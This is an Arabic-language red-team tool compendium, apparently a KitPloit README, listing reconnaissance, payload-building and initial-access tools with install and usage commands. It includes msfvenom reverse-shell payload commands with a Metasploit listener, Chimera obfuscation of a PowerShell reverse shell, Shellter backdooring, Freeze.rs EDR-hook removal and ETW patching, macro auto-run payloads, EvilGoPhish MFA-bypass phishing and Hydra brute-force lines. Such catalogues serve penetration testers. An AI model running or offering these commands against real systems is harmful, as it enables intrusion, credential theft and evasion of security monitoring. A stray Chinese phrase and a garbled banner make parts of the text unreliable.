يقوم Shodan بمسح البنية التحتية العامة ويعرضها بشكل قابل للبحث. باستخدام اسم شركة، اسم نطاق، عنوان IP، من الممكن اكتشاف أنظمة قد تكون ضعيفة تتعلق بهدفك عبر shodan.

image

🔙AORT

أداة لتعداد النطاقات الفرعية، تعداد DNS، كشف WAF، WHOIS، فحص المنافذ، wayback machine، جمع البريد الإلكتروني.

تثبيت:```bash git clone https://github.com/D3Ext/AORT; cd AORT; pip3 install -r requirements.txt

root@kitploit:~
**الاستخدام:**```python
python3 AORT.py -d google.com

image

🔙spoofcheck

برنامج يتحقق مما إذا كان يمكن انتحال نطاق معين. يفحص البرنامج سجلات SPF و DMARC بحثًا عن إعدادات ضعيفة تسمح بالانتحال. بالإضافة إلى ذلك، سينبه إذا كان النطاق يحتوي على إعدادات DMARC ترسل رسائل بريد إلكتروني أو طلبات HTTP عند فشل رسائل SPF/DKIM.

يمكن انتحال النطاقات إذا تحقق أي من الشروط التالية:

  • عدم وجود سجل SPF أو DMARC
  • سجل SPF لا يحدد ~all أو -all مطلقًا
  • سياسة DMARC مضبوطة على p=none أو غير موجودة

تثبيت:```bash git clone https://github.com/BishopFox/spoofcheck; cd spoofcheck; pip install -r requirements.txt

root@kitploit:~
**الاستخدام:**```bash
./spoofcheck.py [DOMAIN]

image

🔙AWSBucketDump

AWSBucketDump هي أداة لتعداد دلائل S3 في AWS بسرعة بحثاً عن الملفات المثيرة للاهتمام. تشبه أداة تخمين النطاقات الفرعية لكنها مصممة خصيصاً لدلائل S3 كما تحتوي على ميزات إضافية تسمح بالبحث عن الملفات وتنزيلها.

التثبيت:``` git clone https://github.com/jordanpotti/AWSBucketDump; cd AWSBucketDump; pip install -r requirements.txt

root@kitploit:~
**الاستخدام:**```
usage: AWSBucketDump.py [-h] [-D] [-t THREADS] -l HOSTLIST [-g GREPWORDS] [-m MAXSIZE]

optional arguments:
  -h, --help    show this help message and exit
  -D            Download files. This requires significant diskspace
  -d            If set to 1 or True, create directories for each host w/ results
  -t THREADS    number of threads
  -l HOSTLIST
  -g GREPWORDS  Provide a wordlist to grep for
  -m MAXSIZE    Maximum file size to download.

 python AWSBucketDump.py -l BucketNames.txt -g interesting_Keywords.txt -D -m 500000 -d 1

🔙GitHarvester

أداة رائعة للعثور على المعلومات من GitHub باستخدام التعبيرات المنتظمة (regex)، مع إمكانية البحث عن مستخدمين و/أو مشاريع محددة على GitHub.

التثبيت:``` git clone https://github.com/metac0rtex/GitHarvester; cd GitHarvester

root@kitploit:~
**الاستخدام:**```
./githarvester.py

🔙truffleHog

TruffleHog هي أداة تقوم بمسح مستودعات git والبحث عن سلاسل عالية الإنتروبيا وأنماط قد تشير إلى وجود أسرار، مثل كلمات المرور ومفاتيح API. باستخدام TruffleHog، يمكنك العثور بسرعة وسهولة على المعلومات الحساسة التي قد تم إرسالها ودفعها عن طريق الخطأ إلى مستودع.

التثبيت (الملفات الثنائية): Link

التثبيت (Go):``` git clone https://github.com/trufflesecurity/trufflehog.git; cd trufflehog; go install

root@kitploit:~
**الاستخدام:**```
trufflehog https://github.com/trufflesecurity/test_keys

image

🔙Dismap

Dismap هي أداة اكتشاف وتحديد الأصول. يمكنها التعرف بسرعة على البروتوكولات ومعلومات البصمات مثل web/tcp/udp، وتحديد أنواع الأصول، وهي مناسبة للشبكات الداخلية والخارجية.

تمتلك Dismap قاعدة بصمات كاملة، تتضمن حاليًا بصمات بروتوكولات tcp/udp/tls وأكثر من 4500 قاعدة بصمة ويب، والتي يمكنها التعرف على favicon وbody وheader وغيرها.

التثبيت:

Dismap هو ملف ثنائي لأنظمة Linux وMacOS وWindows. انتقل إلى Release لتنزيل الإصدار المناسب وتشغيله:```bash

Linux or MacOS

chmod +x dismap-0.3-linux-amd64 ./dismap-0.3-linux-amd64 -h

Windows

dismap-0.3-windows-amd64.exe -h

root@kitploit:~
**الاستخدام:**```bash
# Scan 192.168.1.1 subnet
./dismap -i 192.168.1.1/24

# Scan, output to result.txt and json output to result.json
./dismap -i 192.168.1.1/24 -o result.txt -j result.json

# Scan, Not use ICMP/PING to detect surviving hosts, timeout 10 seconds
./dismap -i 192.168.1.1/24 --np --timeout 10

# Scan, Number of concurrent threads 1000
./dismap -i 192.168.1.1/24 -t 1000

صورة

الصورة مستخدمة من https://github.com/zhzyker/dismap

🔙enum4linux

أداة لجمع المعلومات من أنظمة Windows و Samba.

يمكن استخدامها لجمع مجموعة واسعة من المعلومات، بما في ذلك:

  • معلومات المجال ووحدة تحكم المجال
  • معلومات المستخدمين والمجموعات المحلية
  • المشاركات وأذونات المشاركة
  • سياسات الأمان
  • معلومات Active Directory

التثبيت: (Apt)```bash sudo apt install enum4linux

root@kitploit:~
**تثبيت: (Git)**```bash
git clone https://github.com/CiscoCXSecurity/enum4linux
cd enum4linux

الاستخدام:```bash

'Do everything'

enum4linux.pl -a 192.168.2.55

Obtain list of usernames (RestrictAnonymous = 0)

enum4linux.pl -U 192.168.2.55

Obtain list of usernames (using authentication)

enum4linux.pl -u administrator -p password -U 192.168.2.55

Get a list of groups and their members

enum4linux.pl -G 192.168.2.55

Verbose scan

enum4linux.pl -v 192.168.2.55

root@kitploit:~
يمكن العثور على معلومات الاستخدام الكاملة في هذه [المدونة](https://labs.portcullis.co.uk/tools/enum4linux/).

![image](https://assets.kitploit.com/production/public/readmes/495/fe00ba9f2f4658aa8611e2deabd598ed9ded034e10dca68bc7ebfcb901597d8d.png)

_الصورة مستخدمة من https://allabouttesting.org/samba-enumeration-for-penetration-testing-short-tutorial/_

### [🔙](#tool-list)[skanuvaty](https://github.com/Esc4iCEscEsc/skanuvaty)

ماسح dns/شبكة/منافذ سريع بشكل خطير، تم إنشاؤه بواسطة [Esc4iCEscEsc](https://github.com/Esc4iCEscEsc)، مكتوب بلغة Rust.

ستحتاج إلى ملف نطاقات فرعية. _مثل [قائمة كلمات النطاقات الفرعية بواسطة Sublist3r](https://raw.githubusercontent.com/aboul3la/Sublist3r/master/subbrute/names.txt)_.

**التثبيت:**

قم بتنزيل أحدث إصدار من [هنا](https://github.com/Esc4iCEscEsc/skanuvaty/releases).```bash
# Install a wordlist
sudo apt install wordlists
ls /usr/share/dirb/wordlists
ls /usr/share/amass/wordlists

الاستخدام:```bash skanuvaty --target example.com --concurrency 16 --subdomains-file SUBDOMAIN_WORDLIST.txt

root@kitploit:~
![صورة](https://assets.kitploit.com/production/public/readmes/495/a12af6eef4cb46b200b8d1ea7e42ad172285a5263ce609aff1902ead120ec20d.png)

_صورة مستخدمة من https://github.com/Esc4iCEscEsc/skanuvaty_

### [🔙](#tool-list)[Metabigor](https://github.com/j3ssie/metabigor)

Metabigor هي أداة استخبارات، هدفها القيام بمهام OSINT والمزيد ولكن بدون أي مفتاح API.

**الميزات الرئيسية:**

- البحث عن معلومات حول عنوان IP و ASN والمؤسسة.
- غلاف لتشغيل rustscan و masscan و nmap بكفاءة أعلى على IP/CIDR.
- العثور على المزيد من النطاقات ذات الصلة بالهدف من خلال تطبيق تقنيات متنوعة (شهادة، whois، Google Analytics، إلخ).
- الحصول على ملخص حول عنوان IP (مقدم من [@thebl4ckturtle](https://github.com/theblackturtle))

**التثبيت:**```bash
go install github.com/j3ssie/metabigor@latest

الاستخدام:```bash

discovery IP of a company/organization

echo "company" | metabigor net --org -o /tmp/result.txt

Getting more related domains by searching for certificate info

echo 'Target Inc' | metabigor cert --json | jq -r '.Domain' | unfurl format %r.%t | sort -u # this is old command

Only run rustscan with full ports

echo '1.2.3.4/24' | metabigor scan -o result.txt

Reverse Whois to find related domains

echo 'example.com' | metabigor related -s 'whois'

Get Google Analytics ID directly from the URL

echo 'https://example.com' | metabigor related -s 'google-analytic'

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/55dd22bbf9b6790285f8373fe31c699f489c60f4541a6223af9b7cd77faf5a61.png)

_الصورة مستخدمة من https://github.com/j3ssie/metabigor_

### [🔙](#tool-list)[Gitrob](https://github.com/michenriksen/gitrob)

Gitrob هي أداة للمساعدة في العثور على الملفات الحساسة المحتملة التي تم دفعها إلى المستودعات العامة على Github.

ستقوم Gitrob باستنساخ المستودعات التابعة لمستخدم أو منظمة إلى عمق قابل للتكوين وتتكرر من خلال تاريخ الالتزامات وتضع علامات على الملفات التي تطابق التوقيعات للملفات الحساسة المحتملة.

سيتم عرض النتائج من خلال واجهة ويب لسهولة التصفح والتحليل.

**ملاحظة:** _ستحتاج Gitrob إلى رمز وصول Github للتفاعل مع واجهة برمجة تطبيقات Github. [أنشئ رمز وصول شخصي](https://help.github.com/articles/creating-a-personal-access-token-for-the-command-line/) واحفظه في متغير بيئة في ملف .bashrc الخاص بك أو ملف تكوين صدفة مشابه:_```bash
export GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef

تثبيت: (Go)```bash go get github.com/michenriksen/gitrob

root@kitploit:~
**التثبيت: (ثنائي)**

[إصدار مُجمّع مسبقًا](https://github.com/michenriksen/gitrob/releases) متاح لكل إصدار.

**الاستخدام:**```bash
# Run against org
gitrob {org_name}

# Saving session to a file
gitrob -save ~/gitrob-session.json acmecorp

# Loading session from a file
gitrob -load ~/gitrob-session.json

image

الصورة مستخدمة من https://www.uedbox.com/post/58828/

🔙gowitness

Gowitness هي أداة لالتقاط لقطات شاشة لمواقع الويب مكتوبة بلغة Go، وتستخدم Chrome Headless لإنشاء لقطات شاشة لواجهات الويب من خلال سطر الأوامر، مع عارض تقارير مفيد لمعالجة النتائج. يتم دعم كل من Linux و macOS، مع دعم Windows بشكل شبه كامل.

التثبيت: (Go)```bash go install github.com/sensepost/gowitness@latest

root@kitploit:~
يمكن العثور على معلومات التثبيت الكاملة [هنا](https://github.com/sensepost/gowitness/wiki/Installation).

**الاستخدام:**```bash
# Screenshot a single website
gowitness single https://www.google.com/

# Screenshot a cidr using 20 threads
gowitness scan --cidr 192.168.0.0/24 --threads 20

# Screenshot open http services from an namp file
gowitness nmap -f nmap.xml --open --service-contains http

# Run the report server
gowitness report serve

يمكن العثور على معلومات الاستخدام الكاملة هنا.

image

الصورة مستخدمة من https://github.com/sensepost/gowitness

تطوير الموارد

🔙Chimera

Chimera هي أداة إخفاء لـ PowerShell مصممة لتجاوز حلول AMSI ومكافحة الفيروسات. تقوم بمعالجة ملفات PS1 الضارة المعروفة بإثارة برامج مكافحة الفيروسات وتستخدم استبدال السلسلة وربط المتغيرات لتجنب توقيعات الكشف الشائعة.

التثبيت:```bash sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git sudo git clone https://github.com/tokyoneon/chimera /opt/chimera sudo chown $USER:$USER -R /opt/chimera/; cd /opt/chimera/ sudo chmod +x chimera.sh; ./chimera.sh --help

root@kitploit:~
**الاستخدام:**```bash
./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,\
copyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,\
invoke-expression,out-string,write-error -j -g -k -r -p

image

🔙msfvenom

Msfvenom يتيح إنشاء الحمولات لأنظمة تشغيل مختلفة في نطاق واسع من التنسيقات. كما يدعم إخفاء الحمولات لتجاوز برامج مكافحة الفيروسات.

إعداد المستمع```shell use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST your-ip set LPORT listening-port run

root@kitploit:~
#### أوامر Msfvenom

**PHP:**```bash
msfvenom -p php/meterpreter/reverse_tcp lhost =192.168.0.9 lport=1234 R

ويندوز:```bash msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f exe > shell-x86.exe

root@kitploit:~
**Linux:**```bash
msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf

Java:```bash msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp

root@kitploit:~
**HTA:**```bash
msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f hta-psh > shell.hta

image

🔙Shellter

Shellter هي أداة ديناميكية لحقن شيل كود، وأول أداة حقن ديناميكية حقيقية لملفات PE.

يمكن استخدامها لحقن شيل كود في تطبيقات ويندوز الأصلية (حاليًا لتطبيقات 32 بت فقط).

تستفيد Shellter من البنية الأصلية لملف PE ولا تقوم بأي تعديلات مثل تغيير أذونات الوصول للذاكرة في الأقسام (إلا إذا أراد المستخدم)، أو إضافة قسم إضافي بصلاحية RWE، أو أي شيء قد يبدو مريبًا تحت فحص مضاد الفيروسات.

يمكن العثور على معلومات README الكاملة هنا.

التثبيت: (Kali)```bash apt-get update apt-get install shellter

root@kitploit:~
**التثبيت: (ويندوز)**

قم بزيارة [صفحة التحميل](https://www.shellterproject.com/download/) وقم بالتثبيت.

**الاستخدام:**

ما عليك سوى اختيار برنامج شرعي لوضع الباب الخلفي وتشغيل Shellter.

يمكن العثور على بعض النصائح المفيدة [هنا](https://www.shellterproject.com/tipstricks/).

يمكن العثور على الكثير من العروض التوضيحية من المجتمع [هنا](https://www.shellterproject.com/shellter-community-demos/).

![image](https://assets.kitploit.com/production/public/readmes/495/04c2d11a2a571a26ec7c16cff3fb5d9298164340e32e8efd8ee3f8baac079ef6.png)

_الصورة مأخوذة من https://www.kali.org/tools/shellter/images/shellter.png_

### [🔙](#tool-list)[Freeze](https://github.com/optiv/Freeze)

Freeze هي أداة إنشاء حمولات تُستخدم لتجاوز ضوابط أمان EDR لتنفيذ شيل كود بطريقة خفية.

تستخدم Freeze تقنيات متعددة ليس فقط لإزالة خطافات EDR على مستوى المستخدم، ولكن أيضًا لتنفيذ الشيل كود بطريقة تتجاوز ضوابط المراقبة الأخرى لنقطة النهاية.

**التثبيت:**```bash
git clone https://github.com/optiv/Freeze
cd Freeze
go build Freeze.go

الاستخدام:``` -I string Path to the raw 64-bit shellcode. -O string Name of output file (e.g. loader.exe or loader.dll). Depending on what file extension defined will determine if Freeze makes a dll or exe. -console Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature. -encrypt Encrypts the shellcode using AES 256 encryption -export string For DLL Loaders Only - Specify a specific Export function for a loader to have. -process string The name of process to spawn. This process has to exist in C:\Windows\System32. Example 'notepad.exe' (default "notepad.exe") -sandbox Enables sandbox evasion by checking: Is Endpoint joined to a domain? Does the Endpoint have more than 2 CPUs? Does the Endpoint have more than 4 gigs of RAM? -sha256 Provides the SHA256 value of the loaders (This is useful for tracking)

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/6c3f90681a6549cbc77c48fc0ced412b27f85d65b44c0cf32224d245ae1c994c.png)

_الصورة مستخدمة من https://www.blackhatethicalhacking.com/tools/freeze/_

### [🔙](#tool-list)[WordSteal](https://github.com/0x09AL/WordSteal)

هذا السكريبت سينشئ مستند Microsoft Word مع صورة عن بُعد، مما يتيح التقاط تجزئات NTML من نقطة نهاية الضحية عن بُعد.

يتمتع Microsoft Word بالقدرة على تضمين الصور من مواقع بعيدة، بما في ذلك صورة عن بُعد مستضافة على خادم SMB يتحكم به المهاجم. وهذا يتيح لك فرصة الاستماع والتقاط تجزئات NTLM التي تُرسل عندما تفتح الضحية المُصادَق عليها مستند Word ويتم عرض الصورة.

**التثبيت:**```
git clone https://github.com/0x09AL/WordSteal
cd WordSteal

الاستخدام:```bash

Generate document containing 'test.jpg' and start listener

./main.py 127.0.0.1 test.jpg 1

Generate document containing 'test.jpg' and do not start listener

./main.py 127.0.0.1 test.jpg 0\n

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/a2683bdc376d7179fc8500aa2cf1636e371e52129800bf51c15b79c364391fbd.png)

_صورة مأخوذة من https://pentestit.com/wordsteal-steal-ntlm-hashes-remotely/_

---

### [🔙](#tool-list)[Freeze.rs](https://github.com/optiv/Freeze.rs.git)

إذا كنت ترغب في معرفة المزيد عن التقنيات المستخدمة في هذا الإطار، يرجى إلقاء نظرة على مدونة SourceZero والأداة الأصلية.

**الوصف:**

Freeze.rs هي أداة لإنشاء الحمولات تُستخدم لتجاوز ضوابط أمان EDR لتنفيذ شيل كود بطريقة خفية. تستخدم Freeze.rs تقنيات متعددة ليس فقط لإزالة خطافات EDR في مساحة المستخدم، ولكن أيضًا لتنفيذ شيل كود بطريقة تتجاوز ضوابط المراقبة الأخرى على نقاط النهاية.

**إنشاء عملية معلقة:**

عند إنشاء عملية، يتم تحميل Ntdll.dll كأول DLL؛ يحدث هذا قبل تحميل أي DLLs لـ EDR.这意味着 هناك تأخير بسيط قبل تحميل EDR وبدء ربط وتعديل تجميع DLLs النظامية. بالنظر إلى استدعاءات النظام في Windows في Ntdll.dll، يمكننا رؤية أنه لا يوجد شيء مربوط بعد. إذا قمنا بإنشاء عملية في حالة تعليق (أي مجمدة زمنيًا)، يمكننا أن نرى أنه لا يتم تحميل أي DLLs أخرى باستثناء Ntdll.dll. يمكنك أيضًا رؤية أنه لا توجد DLLs لـ EDR محملة، مما يعني أن استدعاءات النظام الموجودة في Ntdll.dll غير معدلة.

![صورة](https://assets.kitploit.com/production/public/readmes/495/bd6869a0876e06b636a0ab2814e3a2353a4dd7954834e3d79c3b2b44a03c27a4.png)

**توزيع العناوين العشوائي (ASLR)**

لاستخدام هذه العملية المعلقة النظيفة لإزالة الخطافات من مُحمّل Freeze.rs، نحتاج إلى طريقة للعثور على ذاكرة العملية المعلقة النظيفة وقراءتها برمجيًا. هنا يأتي دور توزيع العناوين العشوائي (ASLR). ASLR هي آلية أمان لمنع الثغرات القائمة على تلف ذاكرة المكدس. يقوم ASLR بتوزيع مساحة العناوين داخل العملية بشكل عشوائي، لضمان أن تكون جميع العناصر المعينة في الذاكرة، المكدس، الكومة، والبرنامج القابل للتنفيذ نفسه، فريدة. الآن، هذا هو الجزء المثير للاهتمام لأنه بينما يعمل ASLR، فإنه لا يعمل مع الكود المستقل عن الموقع مثل DLLs. ما يحدث مع DLLs (خاصة DLLs النظامية المعروفة) هو أن مساحة العناوين تُوزع بشكل عشوائي مرة واحدة عند بدء التشغيل. هذا يعني أننا لسنا بحاجة إلى تعداد معلومات عملية عن بُعد للعثور على العنوان الأساسي لـ ntdll.dll الخاص بها لأنه هو نفسه في جميع العمليات، بما في ذلك العملية التي نتحكم فيها. نظرًا لأن عنوان كل DLL هو نفسه في كل تشغيل، يمكننا سحب هذه المعلومات من عمليتنا الخاصة ولا نحتاج أبدًا إلى تعداد العملية المعلقة للعثور على العنوان.

![صورة](https://assets.kitploit.com/production/public/readmes/495/2e982f594ca0dc518cb32bf3ff1e2803416c699a0fe3f067b1d521276352f53d.png)

باستخدام هذه المعلومات، يمكننا استخدام API ReadProcessMemory لقراءة ذاكرة عملية. استدعاء API هذا يرتبط عادةً بقراءة LSASS كجزء من أي هجوم قائم على بيانات الاعتماد؛ ومع ذلك، فهو ليس خبيثًا بطبيعته، خاصة إذا كنا نقرأ فقط قسمًا عشوائيًا من الذاكرة. المرة الوحيدة التي سيتم فيها وضع علامة على ReadProcessMemory كجزء من شيء مريب هي إذا كنت تقرأ شيئًا لا ينبغي لك (مثل محتويات LSASS). لا ينبغي لمنتجات EDR وضع علامة على حقيقة استدعاء ReadProcessMemory أبدًا، حيث توجد استخدامات تشغيلية شرعية لهذه الوظيفة وسيؤدي ذلك إلى العديد من الإيجابيات الكاذبة.

يمكننا أخذ هذا خطوة إلى الأمام بقراءة قسم واحد فقط من Ntdll.dll حيث يتم تخزين جميع استدعاءات النظام - وهو قسم .text الخاص به، بدلاً من قراءة DLL بأكمله.

بدمج هذه العناصر، يمكننا الحصول برمجيًا على نسخة من قسم .text من Ntdll.dll لاستبدال قسم .text المربوط الحالي قبل تنفيذ شيل كود.

**تصحيح ETW**

يستخدم ETW استدعاءات نظام مدمجة لتوليد هذه القياسات عن بُعد. نظرًا لأن ETW أيضًا ميزة أصلية مدمجة في Windows، لا تحتاج منتجات الأمان إلى "ربط" استدعاءات نظام ETW للوصول إلى المعلومات. نتيجة لذلك، لمنع ETW، يقوم Freeze.rs بتصحيح العديد من استدعاءات نظام ETW، مما يفرغ المسجلات ويعيد تدفق التنفيذ إلى التعليمات التالية. أصبح تصحيح ETW الآن افتراضيًا في جميع المُحمّلات.

**شيل كود**

![صورة](https://assets.kitploit.com/production/public/readmes/495/896ef4933a6d5762f9b019a2b557d49af151890f979736ca6c710c856b3d8b94.png)

باستخدام حزمة NTAPI الخاصة بـ Rust، يمكنك رؤية أن كل هذه الاستدعاءات لا تظهر تحت ntdll.dll، ومع ذلك فهي لا تزال موجودة داخل العملية.

![صورة](https://assets.kitploit.com/production/public/readmes/495/8fb4ee66b377c99c51144b36ef80b7f8e795c0197296959ed89161f57838a4c0.png)

ونتيجة لذلك:

![صورة](https://assets.kitploit.com/production/public/readmes/495/a8a1bbb194d7e417c9961540376fcb92dc4092b4cbe524cc5c58ce820cb24568.png)

![صورة](https://assets.kitploit.com/production/public/readmes/495/8a5ddf3aebb2e87f5226d6cde7414adde2d0f4485ddee6aa82170484d8967bd4.png)

**لماذا Rust؟**

بدأ هذا كمشروع ممتع لتعلم Rust وتطور ليصبح إطارًا خاصًا به.

**المساهمة**

تم تطوير Freeze.rs باستخدام Rust.

**التثبيت**

إذا لم يتم تثبيت Rust و Rustup، يرجى تثبيتهما. إذا كنت تقوم بتجميعه من OSX أو Linux، تأكد من إضافة الهدف "x86_64-pc-windows-gnu". للقيام بذلك، قم بتشغيل الأمر التالي:

بمجرد الانتهاء، يمكنك تجميع Freeze.rs، قم بتشغيل الأوامر التالية، أو استخدم الثنائي المُجمّع:```bash
git clone https://github.com/optiv/Freeze
cd Freeze
rustup target add x86_64-pc-windows-gnu
cargo build --release

من هناك، سيتم العثور على الإصدار المترجم في target/release (لاحظ أنه إذا لم تضع --release فسيكون الملف في target/debug/)```bash ___________ _ /_ ____ ____ ________ ____ _______ ______ | ) _ __ _/ __ _/ __ \_ // __ \ _ __ / / | \ | | /\ /\ / / /\ / | | /_
_
/ |
| _
>_
>
___ \___ > /\ |__| /____ > / / / / / / / (@Tyl0us) Soon they will learn that revenge is a dish... best served COLD & Rusty...

USAGE: Freeze-rs [FLAGS] [OPTIONS]

FLAGS: -c, --console Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature -h, --help Prints help information -n, --noetw Disables the ETW patching that prevents ETW events from being generated. -s, --sandbox Enables sandbox evasion by checking: Is Endpoint joined to a domain? Does the Endpoint have more than 2 CPUs? Does the Endpoint have more than 4 gigs of RAM? -V, --version Prints version information

OPTIONS: -E, --Encrypt Encrypts the shellcode using either AES 256, ELZMA or RC4 encryption -I, --Input Path to the raw 64-bit shellcode. -O, --Output Name of output file (e.g. loader.exe or loader.dll). Depending on what file extension defined will determine if Freeze makes a dll or exe. -p, --process The name of process to spawn. This process has to exist in C:\Windows\System32. Example 'notepad.exe' -e, --export Defines a custom export function name for any DLL.

root@kitploit:~
**ثنائي مقابل DLL**
يمكن لـ Freeze.rs إنشاء ملف .exe أو .dll. لتحديد ذلك، تأكد من أن خيار سطر الأوامر `-O` ينتهي إما بـ .exe للثنائيات أو .dll لملفات DLL. لا يتم دعم أنواع الملفات الأخرى حاليًا. في حالة ملفات DLL، يمكن لـ Freeze.rs أيضًا إضافة وظائف تصدير إضافية. للقيام بذلك، استخدم `-export` مع اسم دالة التصدير المحدد.

**التشفير**
يعد تشفير الشيل كود تقنية مهمة تستخدم لحمايته من الاكتشاف والتحليل بواسطة منتجات EDR وحلول الأمان الأخرى. يأتي Freeze.rs مع طرق متعددة لتشفير الشيل كود، وتشمل هذه AES وELZMA وRC4.

**AES**
AES (معيار التشفير المتقدم) هو خوارزمية تشفير متماثلة تُستخدم على نطاق واسع لتشفير البيانات. يستخدم Freeze.rs حجم بت 256 من AES لتشفير الشيل كود. ميزة استخدام AES لتشفير الشيل كود هي أنه يوفر تشفيرًا قويًا ومدعومًا على نطاق واسع من قبل مكتبات التشفير. ومع ذلك، فإن استخدام حجم كتلة ثابت يمكن أن يجعله عرضة لهجمات معينة، مثل هجوم الوسادة الحشوية.

**ELZMA**
ELZMA هي خوارزمية ضغط وتشفير تُستخدم غالبًا في البرامج الضارة لإخفاء الكود. لتشفير الشيل كود باستخدام ELZMA، يتم أولاً ضغط الشيل كود باستخدام خوارزمية ELZMA. ثم يتم تشفير البيانات المضغوطة باستخدام مفتاح عشوائي. يتم بعد ذلك تضمين البيانات المشفرة والمفتاح في كود الاستغلال. ميزة استخدام ELZMA لتشفير الشيل كود هي أنه يوفر كلاً من الضغط والتشفير في خوارزمية واحدة. يمكن أن يساعد هذا في تقليل حجم كود الاستغلال وجعله أكثر صعوبة في الاكتشاف.

**RC4**
RC4 هي خوارزمية تشفير متماثلة تُستخدم غالبًا في البرامج الضارة لتشفير الشيل كود. وهي عبارة عن تشفير تدفقي يمكنه استخدام مفاتيح متغيرة الطول ومعروفة ببساطتها وسرعتها.

**وحدة التحكم**
يستخدم Freeze.rs تقنية لإنشاء العملية أولاً ثم نقلها إلى الخلفية. هذا يفعل شيئين - أولاً، يساعد في إبقاء العملية مخفية، وثانيًا، يتجنب اكتشافها بواسطة أي منتج EDR. يمكن أن يكون إنشاء عملية في الخلفية مباشرة مشبوهًا جدًا ومؤشرًا على الضرر. يفعل Freeze.rs ذلك عن طريق استدعاء دالتي Windows `GetConsoleWindow` و `ShowWindow` بعد إنشاء العملية وتحميل خطافات EDR، ثم تغيير سمات النافذة إلى مخفية.

إذا تم تحديد خيار سطر الأوامر `-console`، فلن يخفي Freeze.rs العملية في الخلفية. بدلاً من ذلك، سيضيف Freeze.rs العديد من رسائل التصحيح التي تعرض ما يفعله المُحمل.

---

### [🔙](#قائمة-الأدوات)WSH

**إنشاء الحمولة:**```vbs
Set shell = WScript.CreateObject("Wscript.Shell")
shell.Run("C:\Windows\System32\calc.exe " & WScript.ScriptFullName),0,True

تنفيذ:```bash wscript payload.vbs cscript.exe payload.vbs wscript /e:VBScript payload.txt //If .vbs files are blacklisted

root@kitploit:~
### [🔙](#tool-list)HTA

**إنشاء الحمولة:**```html
<html>
  <body>
    <script>
      var c = "cmd.exe";
      new ActiveXObject("WScript.Shell").Run(c);
    </script>
  </body>
</html>

تنفيذ: تشغيل الملف

🔙VBA

إنشاء الحمولة:```python Sub calc() Dim payload As String payload = "calc.exe" CreateObject("Wscript.Shell").Run payload,0 End Sub

root@kitploit:~
**تنفيذ:** تعيين الدالة إلى Auto_Open() في مستند ممكّن بماكرو

# الوصول الأولي

### [🔙](#tool-list)[Bash Bunny](https://shop.hak5.org/products/bash-bunny)

Bash Bunny هي أداة هجوم USB فيزيائية ونظام توصيل حمولات متعدد الوظائف. صُمِّمت ليتم توصيلها بمنفذ USB في الكمبيوتر ويمكن برمجتها لأداء مجموعة متنوعة من الوظائف، بما في ذلك التلاعب بالبيانات واستخراجها، وتثبيت البرامج الضارة، وتجاوز الإجراءات الأمنية.

[hackinglab: Bash Bunny – دليل](https://hackinglab.cz/en/blog/bash-bunny-guide/)

[توثيق Hak5](https://docs.hak5.org/bash-bunny/)

[مستودع حمولات رائع](https://github.com/hak5/bashbunny-payloads)

[صفحة المنتج](https://hak5.org/products/bash-bunny)

![image](https://assets.kitploit.com/production/public/readmes/495/a9fc36ccc8742ad176a0455fea6a50a355f6a873f99ab472c3b81989c3093b66.png)

### [🔙](#tool-list)[EvilGoPhish](https://github.com/fin3ss3g0d/evilgophish)

evilginx2 + gophish. (GoPhish) Gophish هو إطار تصيد قوي مفتوح المصدر يجعل من السهل اختبار تعرض مؤسستك للتصيد. (evilginx2) إطار هجوم مستقل من نوع رجل في المنتصف يُستخدم لتصيد بيانات اعتماد تسجيل الدخول مع ملفات تعريف الارتباط الخاصة بالجلسة، مما يسمح بتجاوز المصادقة الثنائية.

**التثبيت:**```bash
git clone https://github.com/fin3ss3g0d/evilgophish

الاستخدام:``` Usage: ./setup <subdomain(s)>

  • root domain - the root domain to be used for the campaign
  • subdomains - a space separated list of evilginx2 subdomains, can be one if only one
  • root domain bool - true or false to proxy root domain to evilginx2
  • redirect url - URL to redirect unauthorized Apache requests
  • feed bool - true or false if you plan to use the live feed
  • rid replacement - replace the gophish default "rid" in phishing URLs with this value
  • blacklist bool - true or false to use Apache blacklist Example: ./setup.sh example.com "accounts myaccount" false https://redirect.com/ true user_id false
root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/d21f6533174ab65dbb6ec6fc044fdad87fe0654f01a6be5f17a862588bf9a0ec.png)

### [🔙](#tool-list)[Social Engineer Toolkit (SET)](https://github.com/IO1337/social-engineering-toolkit)

هذا الإطار رائع لإنشاء حملات للوصول الأولي، 'يحتوي SET على عدد من نواقل الهجوم المخصصة التي تسمح لك بصنع هجوم معقول بسرعة'.

**تثبيت:**```bash
git clone https://github.com/IO1337/social-engineering-toolkit; cd set; python setup.py install

الاستخدام:```bash python3 setoolkit

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/962be1664db4237288b6ac2bf77cb98be8c69715d67efdc36178eb16e8178e1c.png)

### [🔙](#tool-list)[Hydra](https://github.com/vanhauser-thc/thc-hydra)

أداة رائعة لهجمات القوة الغاشمة لتسجيل الدخول. يمكنها مهاجمة عدد من الخدمات بما في ذلك SSH وFTP وTELNET وHTTP وغيرها.

**التثبيت:**```bash
sudo apt install hydra

الاستخدام:```bash hydra -L USER.TXT -P PASS.TXT 1.1.1.1 http-post-form "login.php:username-^USER^&password=^PASS^:Error" hydra -L USER.TXT -P PASS.TXT 1.1.1.1 ssh

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/c1f8846e81658f9a3679da0ff42c1efc12d30861a6a706c61449b956e14f8417.png)

### [🔙](#tool-list)[SquarePhish](https://github.com/secureworks/squarephish)

